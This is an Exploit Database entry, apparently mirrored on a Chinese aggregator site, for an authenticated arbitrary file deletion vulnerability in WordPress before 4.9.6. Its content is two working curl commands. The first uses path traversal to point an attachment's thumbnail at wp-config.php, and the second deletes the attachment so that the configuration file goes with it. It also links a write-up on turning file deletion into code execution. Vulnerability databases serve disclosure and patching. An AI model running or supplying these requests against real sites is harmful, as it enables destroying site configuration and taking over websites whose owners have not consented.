WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion

• Exploit Database
• 17 阅读

• 作者： VulnSpy
  日期： 2018-06-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44949/

• # Exploit Title: WordPress <= 4.9.6 Arbitrary File Deletion Vulnerability
  # Date: 2018-06-27
  # Exploit Author: VulnSpy
  # Vendor Homepage: http://www.wordpress.org
  # Software Link: http://www.wordpress.org/download
  # Version: <= 4.9.6
  # Tested on: php7 mysql5
  # CVE :
  
  Step 1:
  
  ```
  curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
  ```
  
  Step 2:
  
  ```
  curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
  ```
  
  REF:
  WordPress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
  WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/